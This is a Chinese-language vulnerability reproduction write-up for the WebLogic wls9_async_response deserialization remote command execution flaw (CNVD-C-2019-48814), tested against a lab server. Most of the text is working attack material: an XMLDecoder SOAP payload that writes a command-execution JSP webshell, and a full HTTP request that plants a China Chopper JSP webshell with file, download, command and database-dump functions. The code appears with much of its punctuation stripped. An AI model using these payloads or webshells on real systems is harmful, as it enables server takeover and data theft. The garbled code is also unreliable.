项目漏洞概述：
（CNVD-C-2019-48814）Weblogic wls9_async_response 反序列化远程命令执行漏洞存在于wls9-async组件中，攻击者可以向/_async/AsyncResponseService路径下传入构造好的恶意xml格式的数据，传入的数据在服务器端…漏洞概述
（CNVD-C-2019-48814）Weblogic wls9_async_response 反序列化远程命令执行漏洞存在于wls9-async组件中，攻击者可以向/_async/AsyncResponseService路径下传入构造好的恶意xml格式的数据，传入的数据在服务器端反序列化时执行其中的恶意代码，从而造成远程命令执行。
漏洞环境 
服务器：Windows Server 2008，搭建好 WebLogic 环境。IP：192.168.131.157
复现过程 
首先访问/_async/AsyncResponseService来判断是否启用该组件。 刷新页面并启用burpsuite抓包拦截/_async/AsyncResponseService数据包发送到repeater修改method为POST修改新增字段的值把context-type修改成text/xml。poc如下 soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:wsahttp://www.w3.org/2005/08/addressing xmlns:asyhttp://www.bea.com/async/AsyncResponseServicesoapenv:Headerwsa:Actionxx/wsa:Actionwsa:RelatesToxx/wsa:RelatesTowork:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/java version1.8.0_131 classjava.beans.xmlDecoderobject classjava.io.PrintWriterstringservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp/stringvoid methodprintlnstring![CDATA[%if(123.equals(request.getParameter(pwd))){java.io.InputStream in  Runtime.getRuntime().exec(request.getParameter(cmd)).getInputStream();int a  -1;          byte[] b  new byte[1024];          out.print(pre);          while((ain.read(b))!-1){out.println(new String(b));          }out.print(/pre);} %]]/string/voidvoid methodclose//object/java/work:WorkContext/soapenv:Headersoapenv:Bodyasy:onAsyncDelivery//soapenv:Body/soapenv:Envelope成功后访问http://192.168.131.157:7001/bea_wls_internal/webshell.jsp?pwd123cmdwhoami 命令成功执行修改cmd的值为systeminfo命令也被执行。 
上传一句话木马并连接 
poc如下一句话木马为菜刀中jsp格式木马连接密码cmd 
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.131.157:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age0
Content-Type: text/xml
Content-Length: 9839soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:wsahttp://www.w3.org/2005/08/addressing xmlns:asyhttp://www.bea.com/async/AsyncResponseServicesoapenv:Headerwsa:Actionxx/wsa:Actionwsa:RelatesToxx/wsa:RelatesTowork:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/java version1.8.0_131 classjava.beans.xmlDecoderobject classjava.io.PrintWriterstringservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/sh.jsp/stringvoid methodprintlnstring![CDATA[%page importjava.io.*,java.util.*,java.net.*,java.sql.*,java.text.*%
%!String Pwd  cmd;String cs  UTF-8;String EC(String s) throws Exception {return new String(s.getBytes(ISO-8859-1),cs);}Connection GC(String s) throws Exception {String[] x  s.trim().split(choraheiheihei);Class.forName(x[0].trim());if(x[1].indexOf(jdbc:oracle)!-1){return DriverManager.getConnection(x[1].trim():x[4],x[2].equalsIgnoreCase([/null])?:x[2],x[3].equalsIgnoreCase([/null])?:x[3]);}else{Connection c  DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase([/null])?:x[2],x[3].equalsIgnoreCase([/null])?:x[3]);if (x.length  4) {c.setCatalog(x[4]);}return c;}}void AA(StringBuffer sb) throws Exception {File k  new File();File r[]  k.listRoots();for (int i  0; i  r.length; i) {sb.append(r[i].toString().substring(0, 2));}}void BB(String s, StringBuffer sb) throws Exception {File oF  new File(s), l[]  oF.listFiles();String sT, sQ, sF  ;java.util.Date dt;SimpleDateFormat fm  new SimpleDateFormat(yyyy-MM-dd HH:mm:ss);for (int i  0; i  l.length; i) {dt  new java.util.Date(l[i].lastModified());sT  fm.format(dt);sQ  l[i].canRead() ? R : ;sQ  l[i].canWrite() ?  W : ;if (l[i].isDirectory()) {sb.append(l[i].getName()  /\t  sT  \t  l[i].length() \t  sQ  \n);} else {sFl[i].getName()  \t  sT  \t  l[i].length()  \t sQ  \n;}}sb.append(sF);}void EE(String s) throws Exception {File f  new File(s);if (f.isDirectory()) {File x[]  f.listFiles();for (int k  0; k  x.length; k) {if (!x[k].delete()) {EE(x[k].getPath());}}}f.delete();}void FF(String s, HttpServletResponse r) throws Exception {int n;byte[] b  new byte[512];r.reset();ServletOutputStream os  r.getOutputStream();BufferedInputStream is  new BufferedInputStream(new FileInputStream(s));os.write((-  |).getBytes(), 0, 3);while ((n  is.read(b, 0, 512)) ! 
-1) {os.write(b, 0, n);}os.write((|  -).getBytes(), 0, 3);os.close();is.close();}void GG(String s, String d) throws Exception {String h  0123456789ABCDEF;File f  new File(s);f.createNewFile();FileOutputStream os  new FileOutputStream(f);for (int i  0; i  d.length(); i  2) {os.write((h.indexOf(d.charAt(i))  4 | h.indexOf(d.charAt(i  1))));}os.close();}void HH(String s, String d) throws Exception {File sf  new File(s), df  new File(d);if (sf.isDirectory()) {if (!df.exists()) {df.mkdir();}File z[]  sf.listFiles();for (int j  0; j  z.length; j) {HH(s  /  z[j].getName(), d  /  z[j].getName());}} else {FileInputStream is  new FileInputStream(sf);FileOutputStream os  new FileOutputStream(df);int n;byte[] b  new byte[512];while ((n  is.read(b, 0, 512)) ! -1) {os.write(b, 0, n);}is.close();os.close();}}void II(String s, String d) throws Exception {File sf  new File(s), df  new File(d);sf.renameTo(df);}void JJ(String s) throws Exception {File f  new File(s);f.mkdir();}void KK(String s, String t) throws Exception {File f  new File(s);SimpleDateFormat fm  new SimpleDateFormat(yyyy-MM-dd HH:mm:ss);java.util.Date dt  fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s, String d) throws Exception {URL u  new URL(s);int n  0;FileOutputStream os  new FileOutputStream(d);HttpURLConnection h  (HttpURLConnection) u.openConnection();InputStream is  h.getInputStream();byte[] b  new byte[512];while ((n  is.read(b)) ! -1) {os.write(b, 0, n);}os.close();is.close();h.disconnect();}void MM(InputStream is, StringBuffer sb) throws Exception {String l;BufferedReader br  new BufferedReader(new InputStreamReader(is));while ((l  br.readLine()) ! 
null) {sb.append(l  \r\n);}}void NN(String s, StringBuffer sb) throws Exception {Connection c  GC(s);ResultSet r  s.indexOf(jdbc:oracle)!-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while (r.next()) {sb.append(r.getString(1)  \t|\t\r\n);}r.close();c.close();}void OO(String s, StringBuffer sb) throws Exception {Connection c  GC(s);String[] x  s.trim().split(choraheiheihei);ResultSet r  c.getMetaData().getTables(null,s.indexOf(jdbc:oracle)!-1?x.length5?x[5]:x[4]:null, %, new String[]{TABLE});while (r.next()) {sb.append(r.getString(TABLE_NAME)  \t|\t\r\n);}r.close();c.close();}void PP(String s, StringBuffer sb) throws Exception {String[] x  s.trim().split(\r\n);Connection c  GC(s);Statement m  c.createStatement(1005, 1007);ResultSet r  m.executeQuery(select * from   x[x.length-1]);ResultSetMetaData d  r.getMetaData();for (int i  1; i  d.getColumnCount(); i) {sb.append(d.getColumnName(i)   (  d.getColumnTypeName(i) )\t);}r.close();m.close();c.close();}void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception {Connection c  GC(s);Statement m  c.createStatement(1005, 1008);BufferedWriter bw  null;try {ResultSet r  m.executeQuery(q.indexOf(--f:)!-1?q.substring(0,q.indexOf(--f:)):q);ResultSetMetaData d  r.getMetaData();int n  d.getColumnCount();for (int i  1; i  n; i) {sb.append(d.getColumnName(i)  \t|\t);}sb.append(\r\n);if(q.indexOf(--f:)!-1){File file  new File(p);if(q.indexOf(-to:)-1){file.mkdir();}bw  new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf(-to:)!-1?p.trim():pq.substring(q.indexOf(--f:)  4,q.length()).trim()),true),cs));}while (r.next()) {for (int i  1; i  n; i) {if(q.indexOf(--f:)!-1){bw.write(r.getObject(i)\t);bw.flush();}else{sb.append(r.getObject(i)  \t|\t);}}if(bw!null){bw.newLine();}sb.append(\r\n);}r.close();if(bw!null){bw.close();}} catch (Exception e) {sb.append(Result\t|\t\r\n);try {m.executeUpdate(q);sb.append(Execute Successfully!\t|\t\r\n);} catch (Exception ee) 
{sb.append(ee.toString()  \t|\t\r\n);}}m.close();c.close();}
%
%//String Z  EC(request.getParameter(Pwd)  , cs);cs  request.getParameter(code) ! null ? request.getParameter(code) :cs;request.setCharacterEncoding(cs);response.setContentType(text/html;charset  cs);StringBuffer sb  new StringBuffer();
if (request.getParameter(Pwd) ! null) {try {String Z  EC(request.getParameter(action)  );String z1  EC(request.getParameter(z1)  );String z2  EC(request.getParameter(z2)  );sb.append(-  |);String s  request.getSession().getServletContext().getRealPath(/);if (Z.equals(A)) {sb.append(s  \t);if (!s.substring(0, 1).equals(/)) {AA(sb);}} else if (Z.equals(B)) {BB(z1, sb);} else if (Z.equals(C)) {String l  ;BufferedReader br  new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while ((l  br.readLine()) ! null) {sb.append(l  \r\n);}br.close();} else if (Z.equals(D)) {BufferedWriter bw  new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append(1);} else if (Z.equals(E)) {EE(z1);sb.append(1);} else if (Z.equals(F)) {FF(z1, response);} else if (Z.equals(G)) {GG(z1, z2);sb.append(1);} else if (Z.equals(H)) {HH(z1, z2);sb.append(1);} else if (Z.equals(I)) {II(z1, z2);sb.append(1);} else if (Z.equals(J)) {JJ(z1);sb.append(1);} else if (Z.equals(K)) {KK(z1, z2);sb.append(1);} else if (Z.equals(L)) {LL(z1, z2);sb.append(1);} else if (Z.equals(M)) {String[] c  { z1.substring(2), z1.substring(0, 2), z2 };Process p  Runtime.getRuntime().exec(c);MM(p.getInputStream(), sb);MM(p.getErrorStream(), sb);} else if (Z.equals(N)) {NN(z1, sb);} else if (Z.equals(O)) {OO(z1, sb);} else if (Z.equals(P)) {PP(z1, sb);} else if (Z.equals(Q)) {QQ(cs, z1, z2, sb,z2.indexOf(-to:)!-1?z2.substring(z2.indexOf(-to:)4,z2.length()):s.replaceAll(\\\\, /)images/);}} catch (Exception e) {sb.append(ERROR  ://   e.toString());}sb.append(|  -);out.print(sb.toString());
}
%
]]/string/voidvoid methodclose//object/java/work:WorkContext/soapenv:Headersoapenv:Bodyasy:onAsyncDelivery//soapenv:Body/soapenv:Envelope 成功连接后并不能打开任何文件夹，菜鸡还在努力中。